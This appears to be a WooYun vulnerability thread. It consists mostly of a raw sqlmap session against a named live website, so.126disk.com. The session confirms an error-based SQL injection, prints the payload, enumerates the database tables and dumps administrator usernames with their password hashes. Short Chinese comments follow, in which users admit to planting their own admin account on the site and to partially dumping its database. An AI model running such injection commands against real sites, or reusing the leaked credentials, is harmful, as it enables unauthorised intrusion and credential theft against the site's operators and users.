WooYun.org

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 00:23:31[00:23:55] [INFO] testing connection to the target url[00:24:14] [INFO] testing if the url is stable, wait a few seconds[00:24:15] [INFO] url is stable[00:24:15] [INFO] testing if GET parameter 'key' is dynamic[00:24:15] [INFO] confirming that GET parameter 'key' is dynamic[00:24:18] [WARNING] GET parameter 'key' appears to be not dynamic[00:24:19] [WARNING] reflective value(s) found and filtering out[00:24:19] [INFO] heuristic test shows that GET parameter 'key' might be injectable (possible DBMS: MySQL)[00:24:19] [INFO] testing for SQL injection on GET parameter 'key'[00:24:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[00:24:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[00:24:25] [INFO] GET parameter 'key' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable [00:24:25] [INFO] testing 'MySQL > 5.0.11 stacked queries'[00:24:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[00:24:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[00:24:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found[00:25:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'GET parameter 'key' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ysqlmap identified the following injection points with a total of 58 HTTP(s) requests:---Place: GETParameter: key Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI---[00:26:20] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0[00:26:20] [INFO] fetching database names[00:26:21] [INFO] the SQL query used returns 2 entries[00:26:21] [INFO] retrieved: information_schema[00:26:21] [INFO] retrieved: 126diskavailable databases [2]:[*] 126disk[*] information_schema[00:26:21] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/so.126disk.com'[*] shutting down at 00:26:21root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms "Mysql" --tables -D"126disk" sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 00:31:30[00:31:48] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: key Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI---[00:32:06] [INFO] testing MySQL[00:32:06] [WARNING] reflective value(s) found and filtering out[00:32:06] [INFO] confirming MySQL[00:32:07] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0[00:32:07] [INFO] fetching tables for database: '126disk'[00:32:07] [INFO] the SQL query used returns 24 entries[00:32:08] [INFO] retrieved: disk_admin[00:32:08] [INFO] retrieved: disk_adminlog[00:32:08] [INFO] retrieved: disk_adminmsg[00:32:08] [INFO] retrieved: disk_collection[00:32:09] [INFO] retrieved: disk_count[00:32:09] [INFO] retrieved: disk_file[00:32:09] [INFO] retrieved: disk_gonggao[00:32:10] [INFO] retrieved: disk_guolv[00:32:10] [INFO] retrieved: disk_haoyou[00:32:10] [INFO] retrieved: disk_integral[00:32:10] [INFO] retrieved: disk_integrallog[00:32:10] [INFO] retrieved: disk_jubao[00:32:11] [INFO] retrieved: disk_link[00:32:11] [INFO] retrieved: disk_links[00:32:11] [INFO] retrieved: disk_message[00:32:11] [INFO] retrieved: disk_mulu[00:32:11] [INFO] retrieved: disk_search[00:32:11] [INFO] retrieved: disk_server[00:32:12] [INFO] retrieved: disk_tag[00:32:12] [INFO] retrieved: disk_type[00:32:12] [INFO] retrieved: disk_user[00:32:13] [INFO] retrieved: disk_userlog[00:32:13] [INFO] retrieved: disk_visitors[00:32:13] [INFO] retrieved: disk_zhuanjiDatabase: 126disk[24 tables]+------------------+| disk_admin || disk_adminlog || disk_adminmsg || disk_collection || disk_count || disk_file || disk_gonggao || disk_guolv || disk_haoyou || disk_integral || disk_integrallog || disk_jubao || disk_link || disk_links || disk_message || disk_mulu || disk_search || disk_server || disk_tag || disk_type || disk_user || disk_userlog || disk_visitors || disk_zhuanji |+------------------+[00:32:13] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/so.126disk.com'[*] shutting down at 00:32:13root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms "Mysql" --columns -T"disk_admin" -D"126disk" sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 00:33:20[00:33:38] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: key Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI---[00:33:56] [INFO] testing MySQL[00:33:56] [INFO] confirming MySQL[00:33:56] [WARNING] reflective value(s) found and filtering out[00:33:56] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0[00:33:56] [INFO] fetching columns for table 'disk_admin' in database '126disk'[00:33:57] [INFO] the SQL query used returns 4 entries[00:34:00] [INFO] retrieved: id[00:34:00] [INFO] retrieved: int(11)[00:34:00] [INFO] retrieved: user[00:34:00] [INFO] retrieved: varchar(20)[00:34:01] [INFO] retrieved: pass[00:34:01] [INFO] retrieved: varchar(32)[00:34:01] [INFO] retrieved: login[00:34:01] [INFO] retrieved: int(11)Database: 126diskTable: disk_admin[4 columns]+--------+-------------+| Column | Type |+--------+-------------+| id | int(11) || login | int(11) || pass | varchar(32) || user | varchar(20) |+--------+-------------+[00:34:01] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/so.126disk.com'[*] shutting down at 00:34:01root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms "Mysql" --dump -C"user,pass" -T"disk_admin" -D"126disk" sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 00:38:10[00:38:28] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: key Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI---[00:38:47] [INFO] testing MySQL[00:38:47] [INFO] confirming MySQL[00:38:47] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0do you want sqlmap to consider provided column(s):[1] as LIKE column names (default)[2] as exact column names-v 0[00:45:34] [CRITICAL] invalid value[*] shutting down at 00:45:34root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms "Mysql" --dump -C"user,pass" -T"disk_admin" -D"126disk" -v 0 sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 00:45:58[00:46:16] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: key Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI---[00:46:34] [INFO] testing MySQL[00:46:34] [INFO] confirming MySQL[00:46:34] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0do you want sqlmap to consider provided column(s):[1] as LIKE column names (default)[2] as exact column names> [00:52:16] [INFO] fetching columns like 'pass, user' for table 'disk_admin' in database '126disk'[00:52:19] [WARNING] reflective value(s) found and filtering out[00:52:19] [INFO] the SQL query used returns 2 entries[00:52:19] [INFO] retrieved: user[00:52:19] [INFO] retrieved: varchar(20)[00:52:19] [INFO] retrieved: pass[00:52:20] [INFO] retrieved: varchar(32)[00:52:20] [INFO] fetching entries of column(s) 'pass, user' for table 'disk_admin' in database '126disk'[00:52:20] [INFO] the SQL query used returns 2 entries[00:52:20] [INFO] retrieved: b4870218d90c9641481d07f9733d281d[00:52:20] [INFO] retrieved: admin1[00:52:20] [INFO] retrieved: f6fbd3b2d7a6740fffc6e645df80e15d[00:52:21] [INFO] retrieved: admin[00:52:21] [INFO] analyzing table dump for possible password hashesrecognized possible password hashes in column 'pass'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y+--------+----------------------------------+| user | pass |+--------+----------------------------------+| admin1 | b4870218d90c9641481d07f9733d281d---245661320| admin | f6fbd3b2d7a6740fffc6e645df80e15d |+--------+----------------------------------+不会是这个漏洞吧？？

@Night 我去 没想到这个洞我没发呢你就发促回来了 我在里面添加的管理用户名还有呢 我去去去

...这库上次脱了一半 太慢了就没拖